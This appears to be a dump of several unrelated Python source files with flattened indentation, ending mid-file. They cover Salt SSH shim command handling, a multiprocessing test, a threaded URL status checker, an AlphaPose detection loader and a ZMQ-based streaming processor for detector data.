if self.winrm:
target_shim_file = saltwinshell.get_target_shim_file(self, target_shim_file)
self.shell.send(shim_tmp_file.name, target_shim_file, makedirs=True)
# Remove our shim file
try:
os.remove(shim_tmp_file.name)
except OSError:
pass
ret = self.execute_script(script=target_shim_file, extension=extension)
return ret
def cmd_block(self, is_retry=False):
"""
Prepare the pre-check command to send to the subsystem
1. execute SHIM + command
2. check if SHIM returns a master request or if it completed
3. handle any master request
4. re-execute SHIM + command
5. split SHIM results from command results
6. return command results
"""
self.argv = _convert_args(self.argv)
log.debug(
"Performing shimmed, blocking command as follows:\n%s",
" ".join([str(arg) for arg in self.argv]),
)
cmd_str = self._cmd_str()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
log.trace("STDOUT %s\n%s", self.target["host"], stdout)
log.trace("STDERR %s\n%s", self.target["host"], stderr)
log.debug("RETCODE %s: %s", self.target["host"], retcode)
error = self.categorize_shim_errors(stdout, stderr, retcode)
if error:
if error == "Python environment not found on Windows system":
saltwinshell.deploy_python(self)
stdout, stderr, retcode = self.shim_cmd(cmd_str)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
elif error == "Undefined SHIM state":
self.deploy()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
return (
"ERROR: Failure deploying thin, undefined state: {}".format(
stdout
),
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
else:
return "ERROR: {}".format(error), stderr, retcode
# FIXME: this discards output from ssh_shim if the shim succeeds. It should
# always save the shim output regardless of shim success or failure.
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
if re.search(RSTR_RE, stderr):
# Found RSTR in stderr, which means the SHIM completed and the
# remaining output comes only from salt.
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
else:
# RSTR was found in stdout but not stderr - which means there
# is a SHIM command for the master.
shim_command = re.split(r"\r?\n", stdout, 1)[0].strip()
log.debug("SHIM retcode(%s) and command: %s", retcode, shim_command)
if (
"deploy" == shim_command
and retcode == salt.defaults.exitcodes.EX_THIN_DEPLOY
):
self.deploy()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
if not self.tty:
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
log.error(
"ERROR: Failure deploying thin, retrying:\n"
"STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
stdout,
stderr,
retcode,
)
return self.cmd_block()
elif not re.search(RSTR_RE, stdout):
# If RSTR is not seen in stdout with tty, then there
# was a thin deployment problem.
log.error(
"ERROR: Failure deploying thin, retrying:\n"
"STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
stdout,
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
if self.tty:
stderr = ""
else:
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
elif "ext_mods" == shim_command:
self.deploy_ext()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
return (
"ERROR: Failure deploying ext_mods: {}".format(stdout),
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
return stdout, stderr, retcode
def categorize_shim_errors(self, stdout_bytes, stderr_bytes, retcode):
stdout = salt.utils.stringutils.to_unicode(stdout_bytes)
stderr = salt.utils.stringutils.to_unicode(stderr_bytes)
if re.search(RSTR_RE, stdout) and stdout != RSTR + "\n":
# RSTR was found in stdout which means that the shim
# functioned without *errors* . . . but there may be shim
# commands, unless the only thing we found is RSTR
return None
if re.search(RSTR_RE, stderr):
# Undefined state
return "Undefined SHIM state"
if stderr.startswith("Permission denied"):
# SHIM was not even reached
return None
perm_error_fmt = (
"Permissions problem, target user may need to be root or use sudo:\n {0}"
)
errors = [
(
(),
"sudo: no tty present and no askpass program specified",
"sudo expected a password, NOPASSWD required",
),
(
(salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,),
"Python interpreter is too old",
"Python version error. Recommendation(s) follow:\n"
"- Install Python 3 on the target machine(s)\n"
"- You can use ssh_pre_flight or raw shell (-r) to install Python 3",
),
(
(salt.defaults.exitcodes.EX_THIN_CHECKSUM,),
"checksum mismatched",
"The salt thin transfer was corrupted",
),
(
(salt.defaults.exitcodes.EX_SCP_NOT_FOUND,),
"scp not found",
"No scp binary. openssh-clients package required",
),
(
(salt.defaults.exitcodes.EX_CANTCREAT,),
"salt path .* exists but is not a directory",
"A necessary path for salt thin unexpectedly exists:\n " + stderr,
),
(
(),
"sudo: sorry, you must have a tty to run sudo",
"sudo is configured with requiretty",
),
((), "Failed to open log file", perm_error_fmt.format(stderr)),
((), "Permission denied:.*/salt", perm_error_fmt.format(stderr)),
(
(),
"Failed to create directory path.*/salt",
perm_error_fmt.format(stderr),
),
(
(salt.defaults.exitcodes.EX_SOFTWARE,),
"exists but is not",
"An internal error occurred with the shim, please investigate:\n "
+ stderr,
),
(
(),
"The system cannot find the path specified",
"Python environment not found on Windows system",
),
(
(),
"is not recognized",
"Python environment not found on Windows system",
),
]
for error in errors:
if retcode in error[0] or re.search(error[1], stderr):
return error[2]
return None
def check_refresh(self, data, ret):
"""
Stub out check_refresh
"""
return
def module_refresh(self):
"""
Module refresh is not needed, stub it out
"""
return
def lowstate_file_refs(chunks):
"""
Create a list of file ref objects to reconcile
"""
refs = {}
for chunk in chunks:
saltenv = "base"
crefs = []
for state in chunk:
if state == "__env__":
saltenv = chunk[state]
elif state == "saltenv":
saltenv = chunk[state]
elif state.startswith("__"):
continue
crefs.extend(salt_refs(chunk[state]))
if crefs:
if saltenv not in refs:
refs[saltenv] = []
refs[saltenv].append(crefs)
return refs
def salt_refs(data):
"""
Pull salt file references out of the states
"""
proto = "salt://"
ret = []
if isinstance(data, str):
if data.startswith(proto):
return [data]
if isinstance(data, list):
for comp in data:
if isinstance(comp, str):
if comp.startswith(proto):
ret.append(comp)
return ret
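# Sketch of how the two helpers above cooperate (hypothetical lowstate data):
#
#   chunks = [{"__env__": "dev", "name": "/etc/app.conf",
#              "source": "salt://app/app.conf", "state": "file", "fun": "managed"}]
#   lowstate_file_refs(chunks)  ->  {"dev": [["salt://app/app.conf"]]}
#
# salt_refs() itself simply filters strings (or lists of strings) that start
# with the "salt://" protocol prefix.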
def mod_data(fsclient):
"""
Generate the module arguments for the shim data
"""
# TODO, change out for a fileserver backend
sync_refs = [
"modules",
"states",
"grains",
"renderers",
"returners",
]
ret = {}
envs = fsclient.envs()
ver_base = ""
for env in envs:
files = fsclient.file_list(env)
for ref in sync_refs:
mods_data = {}
pref = "_{}".format(ref)
for fn_ in sorted(files):
if fn_.startswith(pref):
if fn_.endswith((".py", ".so", ".pyx")):
full = salt.utils.url.create(fn_)
mod_path = fsclient.cache_file(full, env)
if not os.path.isfile(mod_path):
continue
mods_data[os.path.basename(fn_)] = mod_path
chunk = salt.utils.hashutils.get_hash(mod_path)
ver_base += chunk
if mods_data:
if ref in ret:
ret[ref].update(mods_data)
else:
ret[ref] = mods_data
if not ret:
return {}
ver_base = salt.utils.stringutils.to_bytes(ver_base)
ver = hashlib.sha1(ver_base).hexdigest()
ext_tar_path = os.path.join(
fsclient.opts["cachedir"], "ext_mods.{}.tgz".format(ver)
)
mods = {"version": ver, "file": ext_tar_path}
if os.path.isfile(ext_tar_path):
return mods
tfp = tarfile.open(ext_tar_path, "w:gz")
verfile = os.path.join(fsclient.opts["cachedir"], "ext_mods.ver")
with salt.utils.files.fopen(verfile, "w+") as fp_:
fp_.write(ver)
tfp.add(verfile, "ext_version")
for ref in ret:
for fn_ in ret[ref]:
tfp.add(ret[ref][fn_], os.path.join(ref, fn_))
tfp.close()
return mods
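# Return-value sketch: mod_data() yields {} when no custom modules are found,
# otherwise a mapping such as
#
#   {"version": "<sha1 over the hashes of every synced module>",
#    "file": "<cachedir>/ext_mods.<version>.tgz"}
#
# where the tarball contains an "ext_version" entry plus one "<ref>/<basename>"
# entry per module, e.g. "modules/mymod.py" for a file shipped under _modules
# (file names here are illustrative).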
def ssh_version():
"""
Returns the version of the installed ssh command
"""
# This function needs more granular checks and to be validated against
# older versions of ssh
ret = subprocess.Popen(
["ssh", "-V"], stdout=subprocess.PIPE, stderr=subprocess.PIPE
).communicate()
try:
# "ssh -V" reports e.g. "OpenSSH_7.6p1, OpenSSL ..." on stderr; decode it and
# keep the leading numeric components of the version (iterating the raw bytes
# object, as before, yields byte values rather than digits on Python 3)
version_string = ret[1].split(b",")[0].split(b"_")[1].decode("ascii", "ignore")
parts = []
for part in version_string.split("."):
    try:
        parts.append(int(part))
    except ValueError:
        return tuple(parts)
return tuple(parts)
except IndexError:
return (2, 0)
def _convert_args(args):
"""
Take a list of args, and convert any dicts inside the list to keyword
args in the form of `key=value`, ready to be passed to salt-ssh
"""
converted = []
for arg in args:
if isinstance(arg, dict):
for key in list(arg.keys()):
if key == "__kwarg__":
continue
converted.append("{}={}".format(key, arg[key]))
else:
converted.append(arg)
return converted
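# Example (hypothetical parsed CLI input):
#
#   _convert_args(["test.arg", {"sleep": 1, "__kwarg__": True}])
#   -> ["test.arg", "sleep=1"]
#
# i.e. dicts produced by the argument parser become key=value strings and the
# "__kwarg__" marker itself is dropped.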
|
test_mp.py
|
from multiprocessing import Process, cpu_count
from multiprocessing import JoinableQueue as Queue
from ZermeloSim.ZermeloSim import worker
if __name__ == '__main__':
n = 100
p = cpu_count()-1
jobs = Queue()
results = Queue()
# build the Process handles first (calling .start() inside the comprehension
# would store a list of None), then start them all
pool = [Process(target=worker, args=(jobs, results)) for _ in range(p)]
for proc in pool:
    proc.start()
idx = range(n)
weights = [-1]*n
for job in zip(idx, weights):
jobs.put(job)
jobs.join()
r = [results.get() for _ in range(n)]
for _ in range(p):
jobs.put(None)
jobs.join()
print(r)
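# Note: ``worker`` is imported from ZermeloSim and not shown here. For the
# queue protocol above to shut down cleanly it is assumed to follow roughly
# this shape (names below are illustrative, not the real implementation):
#
#   def worker(jobs, results):
#       while True:
#           job = jobs.get()
#           if job is None:        # sentinel pushed once per process above
#               jobs.task_done()
#               break
#           idx, weight = job
#           results.put((idx, run_simulation(weight)))  # hypothetical helper
#           jobs.task_done()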
|
que.py
|
#!/usr/bin/python3
# Name: que.py
# Version: R3.1
# Author: jvalentinpastrana at gmail
# Date: January 2020
# Function: Includes threading with queue
#
import requests
from threading import Thread
import queue
DIRNAME = "output/"
TIMEOUT = 5
concurrent = 4
# Threading functions
def doWork():
while True:
url = q.get()
status, url = getStatus(url)
writeResult(status, url)
q.task_done()
def getStatus(ourl):
try:
req = requests.head(ourl, timeout=TIMEOUT, proxies={'http':'','https':''})
status = str(req.status_code)
return status, ourl
except Exception:  # any failure (timeout, DNS error, bad URL) is reported as "XXX"
return "XXX", ourl
def writeResult(status, ourl):
urlFilter.write(status + ' ' + ourl + '\n')
print(status + ' ' + ourl )
# Start the parallel queue and worker threads
q = queue.Queue(concurrent)
for i in range(concurrent):
t = Thread(target=doWork)
t.daemon = True
t.start()
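# The script stops here in its published form: nothing ever feeds the queue and
# ``urlFilter`` (used by writeResult above) is never opened. A minimal driver
# could look like the following sketch -- the "urls.txt" input file and the
# output file name are assumptions, not part of the original script:
#
#   urlFilter = open(DIRNAME + 'filtered.txt', 'w')
#   with open('urls.txt') as infile:
#       for line in infile:
#           q.put(line.strip())
#   q.join()
#   urlFilter.close()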
|
file_detector.py
|
from itertools import count
from threading import Thread
from queue import Queue
import json
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.presets import SimpleTransform
class FileDetectionLoader():
def __init__(self, input_source, cfg, opt, queueSize=128):
self.cfg = cfg
self.opt = opt
self.bbox_file = input_source
self._input_size = cfg.DATA_PRESET.IMAGE_SIZE
self._output_size = cfg.DATA_PRESET.HEATMAP_SIZE
self._sigma = cfg.DATA_PRESET.SIGMA
if cfg.DATA_PRESET.TYPE == 'simple':
self.transformation = SimpleTransform(
self, scale_factor=0,
input_size=self._input_size,
output_size=self._output_size,
rot=0, sigma=self._sigma,
train=False, add_dpg=False)
# initialize the det file list
boxes = None
if isinstance(self.bbox_file,list):
boxes = self.bbox_file
else:
with open(self.bbox_file, 'r') as f:
boxes = json.load(f)
assert boxes is not None, 'Failed to load %s!' % self.bbox_file
self.all_imgs = []
self.all_boxes = {}
self.all_scores = {}
self.all_ids = {}
num_boxes = 0
for k_img in range(0, len(boxes)):
det_res = boxes[k_img]
img_name = det_res['image_id']
if img_name not in self.all_imgs:
self.all_imgs.append(img_name)
self.all_boxes[img_name] = []
self.all_scores[img_name] = []
self.all_ids[img_name] = []
x1, y1, w, h = det_res['bbox']
bbox = [x1, y1, x1 + w, y1 + h]
score = det_res['score']
self.all_boxes[img_name].append(bbox)
self.all_scores[img_name].append(score)
if 'idx' in det_res.keys():
self.all_ids[img_name].append(int(det_res['idx']))
else:
self.all_ids[img_name].append(0)
# initialize the queue used to store data
"""
pose_queue: the buffer storing post-processed cropped human image for pose estimation
"""
if opt.sp:
self._stopped = False
self.pose_queue = Queue(maxsize=queueSize)
else:
self._stopped = mp.Value('b', False)
self.pose_queue = mp.Queue(maxsize=queueSize)
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to pre process images for object detection
image_preprocess_worker = self.start_worker(self.get_detection)
return [image_preprocess_worker]
def stop(self):
# clear queues
self.clear_queues()
def terminate(self):
if self.opt.sp:
self._stopped = True
else:
self._stopped.value = True
self.stop()
def clear_queues(self):
self.clear(self.pose_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def wait_and_put(self, queue, item):
if not self.stopped:
queue.put(item)
def wait_and_get(self, queue):
if not self.stopped:
return queue.get()
def get_detection(self):
for im_name_k in self.all_imgs:
boxes = torch.from_numpy(np.array(self.all_boxes[im_name_k]))
scores = torch.from_numpy(np.array(self.all_scores[im_name_k]))
ids = torch.from_numpy(np.array(self.all_ids[im_name_k]))
orig_img_k = cv2.cvtColor(cv2.imread(im_name_k), cv2.COLOR_BGR2RGB)  # scipy.misc.imread(im_name_k, mode='RGB') is deprecated
inps = torch.zeros(boxes.size(0), 3, *self._input_size)
cropped_boxes = torch.zeros(boxes.size(0), 4)
for i, box in enumerate(boxes):
inps[i], cropped_box = self.transformation.test_transform(orig_img_k, box)
cropped_boxes[i] = torch.FloatTensor(cropped_box)
self.wait_and_put(self.pose_queue, (inps, orig_img_k, im_name_k, boxes, scores, ids, cropped_boxes))
self.wait_and_put(self.pose_queue, (None, None, None, None, None, None, None))
return
def read(self):
return self.wait_and_get(self.pose_queue)
@property
def stopped(self):
if self.opt.sp:
return self._stopped
else:
return self._stopped.value
@property
def length(self):
return len(self.all_imgs)
@property
def joint_pairs(self):
"""Joint pairs which defines the pairs of joint to be swapped
when the image is flipped horizontally."""
return [[1, 2], [3, 4], [5, 6], [7, 8],
[9, 10], [11, 12], [13, 14], [15, 16]]
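# Typical wiring (rough sketch; the ``cfg`` and ``opt`` objects come from the
# AlphaPose configuration system and are assumptions here):
#
#   loader = FileDetectionLoader('detections.json', cfg, opt)
#   workers = loader.start()          # spawns get_detection() in a thread/process
#   for _ in range(loader.length):
#       inps, orig_img, im_name, boxes, scores, ids, cropped = loader.read()
#       ...                           # run pose estimation on `inps`
#   loader.stop()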
|
connector.py
|
"""
Author : Lyubimov, A.Y.
Created : 03/31/2020
Last Changed: 05/15/2020
Description : Streaming stills processor for live data analysis
"""
from __future__ import absolute_import, division, print_function
import os
import time
import zmq
from threading import Thread
from interceptor import packagefinder, read_config_file
from interceptor.connector.processor import FastProcessor
from interceptor.connector import utils
def debug_segfault():
""" Deliberate segfault for debugging purposes """
import ctypes
ctypes.string_at(1)
class ZMQProcessBase:
""" Base class for Connector, Reader, and Collector classes """
def __init__(self, comm, args, name="zmq_thread", localhost="localhost"):
""" Constructor
:param comm: mpi4py communication instance
:param args: command line arguments
:param name: thread name (for logging mostly)
:param localhost: the host of the Collector process (ranked 0)
"""
self.name = name
self.comm = comm
self.localhost = localhost
if comm:
self.rank = comm.Get_rank() # each process in MPI has a unique id
self.size = comm.Get_size() # number of processes running in this job
else:
self.rank = args.rank
self.size = args.n_proc
self.stop = False
self.timeout_start = None
self.args = args
self.generate_config()
def generate_config(self):
# generate startup config params
if self.args.config_file:
s_config = read_config_file(self.args.config_file)
else:
s_config = packagefinder('startup.cfg', 'connector', read_config=True)
# convert to namedtuple because 1) not easily mutable, 2) can call attributes
self.cfg = s_config[self.args.beamline]
@staticmethod
def make_socket(
socket_type,
wid,
host=None,
port=None,
url=None,
bind=False,
verbose=False,
):
assert (host and port) or url
# assemble URL from host and port
if not url:
url = "tcp://{}:{}".format(host, port)
# Create socket
context = zmq.Context()
socket = context.socket(getattr(zmq, socket_type.upper()))
socket.identity = wid.encode('ascii')
# Connect to URL
socket.connect(url)
if verbose:
print('{} connected to {}'.format(wid, url))
# Bind to port
if bind:
if not port:
bind_port = url[-4:]
else:
bind_port = port
bind_url = "tcp://*:{}".format(bind_port)
socket.bind(bind_url)
if verbose:
print('{} bound to {}'.format(wid, bind_url))
return socket
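# Example (illustrative values only): a Reader-side REQ socket pointed at the
# broker would be created roughly as
#
#   socket = self.make_socket(socket_type='req', wid='ZMQ_001',
#                             host='localhost', port='6001', verbose=True)
#
# while a Collector-side PULL socket additionally passes bind=True so that it
# listens on the port instead of only connecting to it.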
def broadcast(self, data):
if self.comm:
self.comm.bcast(data, root=0)
class Connector(ZMQProcessBase):
""" A ZMQ Broker class, with a zmq.PULL backend (facing a zmq.PUSH Splitter) and
a zmq.ROUTER front end (facing zmq.REQ Readers). Is intended to a) get images
from Splitter and assign each image to the least-recently used (LRU) Reader,
b) handle start-up / shut-down signals, as well as type-of-processing signals
from Splitter, c) manage MPI processes, d) serve as a failpoint away from
Splitter, which is writing data to files """
def __init__(self, name="CONN", comm=None, args=None, localhost="localhost"):
super(Connector, self).__init__(
name=name, comm=comm, args=args, localhost=localhost
)
self.initialize_ends()
self.readers = []
def initialize_ends(self):
""" initializes front- and backend sockets """
wport = "6{}".format(str(self.cfg.getstr('port'))[1:])
self.read_end = self.make_socket(
socket_type="router",
wid="{}_READ".format(self.name),
host=self.localhost,
port=wport,
bind=True,
)
self.data_end = self.make_socket(
socket_type="pull",
wid="{}_DATA".format(self.name),
host=self.cfg.getstr('host'),
port=self.cfg.getstr('port'),
)
self.poller = zmq.Poller()
def connect_readers(self):
# register backend and frontend with poller
self.poller.register(self.read_end, zmq.POLLIN)
self.poller.register(self.data_end, zmq.POLLIN)
while True:
sockets = dict(self.poller.poll())
if self.read_end in sockets:
# handle worker activity
request = self.read_end.recv_multipart()
if not request[0] in self.readers:
self.readers.append(request[0])
if self.data_end in sockets:
# Receive frames and assign to readers
frames = self.data_end.recv_multipart()
if self.readers:
reader = self.readers.pop()
rframes = [reader, b"", b"BROKER", b""]
rframes.extend(frames)
self.read_end.send_multipart(rframes)
else:
frmdict = utils.decode_frame_header(frames[2])
print(
"WARNING! NO READY READERS! Skipping frame #", frmdict["frame"]
)
def run(self):
self.connect_readers()
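# Routing note: frames pushed to a Reader are wrapped in the envelope
# [reader_identity, b"", b"BROKER", b"", *splitter_frames]. The ROUTER socket
# consumes the identity and the REQ socket strips the empty delimiter, so the
# Reader receives [b"BROKER", b"", *splitter_frames] -- which is why
# Reader.read_stream() drops the first two frames when --broker is in use.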
class Reader(ZMQProcessBase):
""" ZMQ Reader: requests a single frame (multipart) from the Eiger,
converts to dictionary format, attaches to a special format class,
carries out processing, and sends the result via ZMQ connection to the
Collector class.
"""
def __init__(self, name="zmq_reader", comm=None, args=None, localhost="localhost"):
super(Reader, self).__init__(
name=name, comm=comm, args=args, localhost=localhost
)
self.generate_processor()
def generate_processor(self, run_mode='DEFAULT'):
self.processor = FastProcessor(
run_mode=run_mode,
configfile=self.cfg.getstr('processing_config_file'),
test=self.args.test,
)
if self.rank == 2:
self.processor.print_params()
def convert_from_stream(self, frames):
img_info = {
"state": "import",
"proc_name": self.name,
"proc_url": "tcp://{}:{}".format(self.cfg.getstr('host'), self.cfg.getstr(
'port')),
"series": -1,
"frame": -1,
"run_mode": None,
"mapping": "",
'exposure_time': 0.1,
}
return_frames = None
if len(frames) <= 2: # catch stand-alone header frame or end-of-series frame
fdict = utils.decode_header(frames[0])
try:
assert "htype" in fdict
except AssertionError:
img_info["state"] = "error"
img_info["dat_error"] = 'DATA ERROR: Invalid entry: no "hdict" key!'
else:
if "dseries_end" in fdict["htype"]:
img_info["state"] = "series-end"
elif self.cfg.getstr('header_type') in fdict["htype"]:
try:
self.make_header(frames)
except Exception as e:
img_info["state"] = "error"
img_info["dat_error"] = "HEADER ERROR: {}".format(str(e))
else:
img_info["series"] = -999
img_info["frame"] = -999
img_info["state"] = "header-frame"
else:
hdr_frames = frames[:2]
img_frames = frames[2:]
self.make_header(frames=hdr_frames)
try:
# Get custom keys (if any) from header
hdict = utils.decode_header(header=self.header[0])
custom_keys_string = self.cfg.getstr('custom_keys')
if custom_keys_string is not None:
custom_keys = [k.strip() for k in custom_keys_string.split(',')]
for ckey in custom_keys:
if ckey == self.cfg.getstr('filepath_key'):
img_info['filename'] = os.path.basename(hdict[ckey])
img_info['full_path'] = hdict[ckey]
else:
if self.cfg.getstr('run_mode_key') in ckey:
p_idx = self.cfg.getint('run_mode_key_index')
img_info["run_mode"] = hdict[ckey].split('.')[p_idx]
img_info[ckey] = hdict[ckey]
# Get exposure time (frame time) from header
hdict_1 = utils.decode_frame(frame=self.header[1])
img_info['exposure_time'] = float(hdict_1['frame_time'])
# Get frame info from frame
fdict = utils.decode_frame_header(img_frames[0][:-1])
img_info.update(
{"series": fdict["series"], "frame": fdict["frame"], }
)
img_info["state"] = "process"
return_frames = img_frames
except Exception as e:
img_info["state"] = "error"
img_info["dat_error"] = "CONVERSION ERROR: {}".format(str(e))
return img_info, return_frames
def make_header(self, frames):
if isinstance(frames[0], bytes):
self.header = [frames[0][:-1], frames[1][:-1]]
else:
self.header = [frames[0].bytes[:-1], frames[1].bytes[:-1]]
def make_data_dict(self, frames):
info, frames = self.convert_from_stream(frames)
if info["state"] in ["error", "header-frame", "series-end"]:
data = None
else:
data = {"header1": self.header[0], "header2": self.header[1]}
for frm in frames:
i = frames.index(frm) + 1
key = "streamfile_{}".format(i)
if i != 3:
data[key] = frm[:-1] if isinstance(frm, bytes) else frm.bytes[:-1]
else:
data[key] = frm if isinstance(frm, bytes) else frm.bytes
proc_info = {
"beamXY": (0, 0),
"dist": 0,
"n_spots": 0,
"n_overloads": 0,
"hres": 99.0,
"score": 0,
"n_ice_rings": 0,
"mean_shape_ratio": 0,
"n_indexed": 0,
"sg": "NA",
"uc": "NA",
"comment": "",
"t0": 0,
"phil": "",
}
info.update(proc_info)
return data, info
def process(self, info, frame, filename):
s_proc = time.time()
# regenerate processor if necessary
if info['run_mode'] != self.processor.run_mode:
self.generate_processor(run_mode=info['run_mode'])
# process image
info = self.processor.run(data=frame, filename=filename, info=info)
info["proc_time"] = time.time() - s_proc
return info
def write_eiger_file(self):
eiger_idx = self.rank
filename = "eiger_{}.stream".format(eiger_idx)
self.name = "ZMQ_{:03d}".format(eiger_idx)
with open(filename, "w") as fh:
fh.write("EIGERSTREAM")
return filename
def initialize_zmq_sockets(self, init_r_socket=True):
try:
# If the Connector is active, connect the Reader socket to the Connector;
# if not, connect the Reader socket to the Splitter
if self.args.broker:
dhost = self.localhost
dport = "6{}".format(str(self.cfg.getstr('port'))[1:])
else:
dhost = self.cfg.getstr('host')
dport = self.cfg.getstr('port')
self.d_socket = self.make_socket(
socket_type="req",
wid=self.name,
host=dhost,
port=dport,
verbose=self.args.verbose,
)
proc_url = "tcp://{}:{}".format(dhost, dport)
if init_r_socket:
# if collector_host option exists, use it
if self.args.collector_host:
chost = self.args.collector_host
else:
chost = self.localhost
cport = "7{}".format(str(self.cfg.getstr('port'))[1:])
self.r_socket = self.make_socket(
socket_type="push",
wid="{}_2C".format(self.name),
host=chost,
port=cport,
verbose=self.args.verbose,
)
except Exception as e:
print("SOCKET ERROR: {}".format(e))
exit()
else:
info = {
"proc_name": self.name,
"proc_url": proc_url,
"state": "connected",
}
self.r_socket.send_json(info)
def read_stream(self):
# Write eiger_*.stream file
filename = self.write_eiger_file()
# Initialize ZMQ sockets
self.initialize_zmq_sockets()
# Start listening for ZMQ stream
while True:
time_info = {
"receive_time": 0,
"wait_time": 0,
"total_time": 0,
}
try:
start = time.time()
self.d_socket.send(self.name.encode('utf-8'))
expecting_reply = True
while expecting_reply:
# poll() expects milliseconds; the configured timeout is read as a string, so
# cast it to int before scaling (str * 1000 would just repeat the string)
timeout = (int(self.cfg.getstr('timeout')) * 1000
           if self.cfg.getstr('timeout') else None)
if self.d_socket.poll(timeout=timeout):
fstart = time.time()
frames = self.d_socket.recv_multipart()
time_info["receive_time"] = time.time() - fstart
time_info["wait_time"] = time.time() - start - time_info[
"receive_time"]
if self.args.broker: # if it came from broker, remove first two frames
frames = frames[2:]
expecting_reply = False
else:
# close and re-initialize d_socket
self.d_socket.close()
self.initialize_zmq_sockets(init_r_socket=False)
self.d_socket.send(b"Hello")
except Exception as exp:
print("DEBUG: {} CONNECT FAILED! {}".format(self.name, exp))
continue
else:
# Drain images without processing
if self.args.drain:
if self.args.verbose:
print(
str(frames[0].bytes[:-1])[3:-2],
"({})".format(self.name),
"rcv time: {:.4f} sec".format(time_info["receive_time"]),
)
else:
# make data and info dictionaries
data, info = self.make_data_dict(frames)
# handle different info scenarios
# some unknown error
if info is None:
print("debug: info is None!")
continue
# normal processing info
elif info["state"] == "process":
info = self.process(info, frame=data, filename=filename)
time_info["total_time"] = time.time() - start
info.update(time_info)
# end-of-series signal (sleep for four seconds... maybe obsolete)
elif info["state"] == "series-end":
time.sleep(4)
continue
# send info to collector
self.r_socket.send_json(info)
self.d_socket.close()
def run(self):
self.read_stream()
def abort(self):
self.stop = True
class Collector(ZMQProcessBase):
""" Runs as 0-ranked process in MPI; collects all processing results from
individual Reader processes and prints them to stdout and sends them
off as a single stream to the UI if requested.
"""
def __init__(self, name="COLLECTOR", comm=None, args=None, localhost=None):
super(Collector, self).__init__(
name=name, comm=comm, args=args, localhost=localhost
)
self.readers = {}
self.advance_stdout = False
def monitor_splitter_messages(self):
# listen for messages from the splitter monitor port
# todo: it occurs to me that this can be used for a variety of purposes!
mport = "5{}".format(str(self.cfg.getstr('port'))[1:])
self.m_socket = self.make_socket(
socket_type="sub",
wid=self.name + "_M",
host=self.cfg.getstr('host'),
port=mport,
bind=True,
verbose=True,
)
self.m_socket.setsockopt(zmq.SUBSCRIBE, b'')
while True:
msg = self.m_socket.recv()
if msg:
print('\n*** RUN FINISHED! ***\n')
print(time.strftime('%b %d %Y %I:%M:%S %p'))
msg_dict = utils.decode_frame(msg, tags='requests')
checked_in = msg_dict['requests']
hung_readers = []
down_readers = []
for rdr in self.readers.keys():
if not rdr in checked_in.keys():
down_readers.append(rdr)
elif not "series_end" in checked_in[rdr]:
hung_readers.append(rdr)
if hung_readers:
print('{} Readers down during this run:'.format(len(hung_readers)))
for rdr in hung_readers:
# 'last_reported' may not have been recorded for this reader; fall back to
# its connection time so a missing key cannot crash the report
lt = time.localtime(self.readers[rdr].get('last_reported',
                                          self.readers[rdr]['start_time']))
silent_since = time.strftime('%b %d %Y %I:%M:%S %p', lt)
print(' {} silent since {}'.format(rdr, silent_since))
if down_readers:
print('{} Readers are permanently down:'.format(len(down_readers)))
for rdr in down_readers:
lt = time.localtime(self.readers[rdr].get('last_reported',
                                          self.readers[rdr]['start_time']))
silent_since = time.strftime('%b %d %Y %I:%M:%S %p', lt)
print(' {} down since {}'.format(rdr, silent_since))
idle_readers = len(self.readers) - len(hung_readers) - len(down_readers)
print('{} of {} Readers are CONNECTED and IDLE'.format(
idle_readers,
len(self.readers), ),
flush=True)
self.send_check_in_info(hung_readers, down_readers)
self.advance_stdout = True
def send_check_in_info(self, hung_readers, down_readers):
down_readers.extend(hung_readers)
down_dict = {"down_readers": down_readers}
self.broadcast(data=down_dict)
def understand_info(self, info):
reader_name = info['proc_name']
if info["state"] == "connected":
# add reader index to dictionary of active readers with state "ON"
self.readers[reader_name] = {
'name': reader_name,
'status': 'IDLE',
'start_time': time.time(),
}
msg = "{} CONNECTED to {}".format(reader_name, info["proc_url"])
if len(self.readers) == self.size - 1:
msg = '{} Readers connected ({})'.format(
len(self.readers),
time.strftime('%b %d %Y %I:%M:%S %p'),
)
self.advance_stdout = True
elif info["state"] == "series-end":
# mark the reader as idle again once its series has ended
self.readers[reader_name]['status'] = 'IDLE'
msg = "{} received END-OF-SERIES signal".format(reader_name)
else:
self.readers[reader_name]['status'] = 'WORKING'
if info["state"] == "error":
msg = "{} DATA ERROR: {}".format(info["proc_name"], info["dat_error"])
elif info["state"] != "process":
msg = "DEBUG: {} STATE IS ".format(info["state"])
else:
return False
if self.args.verbose:
print(msg, flush=True)
return True
def write_to_file(self, rlines):
